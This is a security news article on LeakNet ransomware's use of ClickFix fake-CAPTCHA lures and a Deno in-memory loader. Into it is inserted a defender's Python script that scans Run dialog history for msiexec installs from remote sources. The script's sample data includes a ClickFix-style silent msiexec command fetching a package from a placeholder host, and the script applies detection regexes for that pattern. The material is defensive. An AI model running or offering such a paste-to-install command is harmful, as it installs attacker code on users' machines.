LeakNet Ransomware Uses ClickFix via Hacked Sites, Deploys Deno In-Memory Loader

https://thehackernews.com/2026/03/leaknet-ransomware-uses-clickfix-via.html

Publish Date: 2026-03-17 10:34:00

Source Domain: thehackernews.com

The ransomware operation known as LeakNet has adopted the ClickFix social engineering tactic delivered through compromised websites as an initial access method.

The use of ClickFix, where users are tricked into manually running malicious commands to address non-existent errors, is a departure from relying on traditional methods for obtaining initial access, such as through stolen credentials acquired from initial access brokers (IABs), ReliaQuest said in a technical report published today.

The second important aspect of these attacks is the use of a staged command-and-control (C2) loader built on the Deno JavaScript runtime to execute malicious payloads directly in memory.

“The key takeaway here is that both entry paths lead to the same repeatable post-exploitation sequence every time,” the cybersecurity company said. “That gives defenders something concrete to work with: known behaviors you can detect and disrupt at each stage, well before ransomware deployment, regardless of how LeakNet got in.”

LeakNet first emerged in November 2024, describing itself as a “digital watchdog” and framing its activities as focused on internet freedom and transparency. According to data captured by Dragos, the group has also targeted industrial entities.

The use of ClickFix to breach victims offers several advantages, the most significant being that it reduces dependence on third-party suppliers, lowers per-victim acquisition cost, and removes the operational bottleneck of waiting for valuable accounts to hit the market.

In these attacks, the legitimate-but-compromised sites are used to serve fake CAPTCHA verification checks that instruct users to copy and paste a “msiexec.exe” command into the Windows Run dialog. The attacks are not confined to a specific industry vertical, instead casting a wide net to infect as many victims as possible.
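A defender-side check for the paste-into-Run step described above, added here as an example and not taken from the ReliaQuest report or the article: Windows keeps Run dialog history in the per-user RunMRU registry key, so `reg query` output can be screened for msiexec commands that pull a package from a URL or UNC share. The sample output, the placeholder URL and the function names are constructed for illustration.

```python
import re

# Constructed sample of `reg query` output for the per-user Run dialog history
# key (RunMRU). The URL is a placeholder, not an indicator from the report.
SAMPLE_REG_QUERY = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
    a    REG_SZ    notepad\1
    MRUList    REG_SZ    cba
    b    REG_SZ    msiexec /i C:\Installers\vpn-client.msi\1
    c    REG_SZ    "MSIEXEC.EXE" /qn /i https://cdn.example.invalid/verify.msi\1
"""

VALUE_LINE = re.compile(r"^\s+(\S+)\s+REG_SZ\s+(.*)$")
# msiexec as the first token, with or without quotes, a path or the .exe suffix.
MSIEXEC = re.compile(r'^"?(?:[^"\s]*[\\/])?msiexec(?:\.exe)?"?(?=\s|$)', re.I)
# A package fetched from outside the host: http(s) URL or UNC share.
REMOTE_SOURCE = re.compile(r'(?:https?://|\\\\[^\\\s]+\\)', re.I)


def parse_runmru(reg_output):
    """Return Run dialog commands, most recent first, from `reg query` text."""
    values = {}
    for line in reg_output.splitlines():
        m = VALUE_LINE.match(line)
        if m:
            values[m.group(1)] = m.group(2).strip()
    # MRUList gives recency order; fall back to value-name order if absent.
    order = values.pop("MRUList", "") or "".join(sorted(values))
    # Each stored command carries a trailing "\1" marker; strip it.
    return [re.sub(r"\\1$", "", values[k]) for k in order if k in values]


def flag_remote_msiexec(commands):
    """Keep only msiexec invocations whose package source is remote."""
    return [c for c in commands
            if MSIEXEC.search(c.strip()) and REMOTE_SOURCE.search(c)]


if __name__ == "__main__":
    for cmd in flag_remote_msiexec(parse_runmru(SAMPLE_REG_QUERY)):
        print("review:", cmd)
```

Feed it the output of `reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU` collected per user; a hit is a lead for triage, since administrators also install packages from shares.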

The development comes as more threat actors are adopting the ClickFix playbook, as it abuses trusted, everyday workflows to entice users…
